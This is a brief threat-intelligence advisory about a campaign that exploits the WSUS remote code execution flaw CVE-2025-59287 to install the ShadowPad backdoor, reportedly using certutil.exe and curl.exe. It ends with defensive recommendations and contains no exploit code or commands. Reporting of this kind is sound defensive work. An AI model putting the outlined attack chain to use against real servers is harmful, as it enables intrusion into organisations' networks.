An exploitation campaign has emerged, targeting a recent RCE vulnerability in Microsoft Windows Server Update Services (WSUS) to distribute the ShadowPad backdoor used by Chinese state-aligned APT groups. Immediate patching and security measures are crucial to prevent further breaches. #CVE202559287 #ShadowPad
Keypoints
- An active campaign exploits CVE-2025-59287 to compromise Windows Servers with WSUS enabled.
- Threat actors rapidly weaponized publicly released exploit code to distribute ShadowPad malware.
- Attackers used legitimate Windows utilities like certutil.exe and curl.exe to install the backdoor.
- ShadowPad operates behind legitimate executables and contains encrypted configuration data and modules.
- Organizations are advised to apply security updates, restrict WSUS access, and monitor for suspicious activity.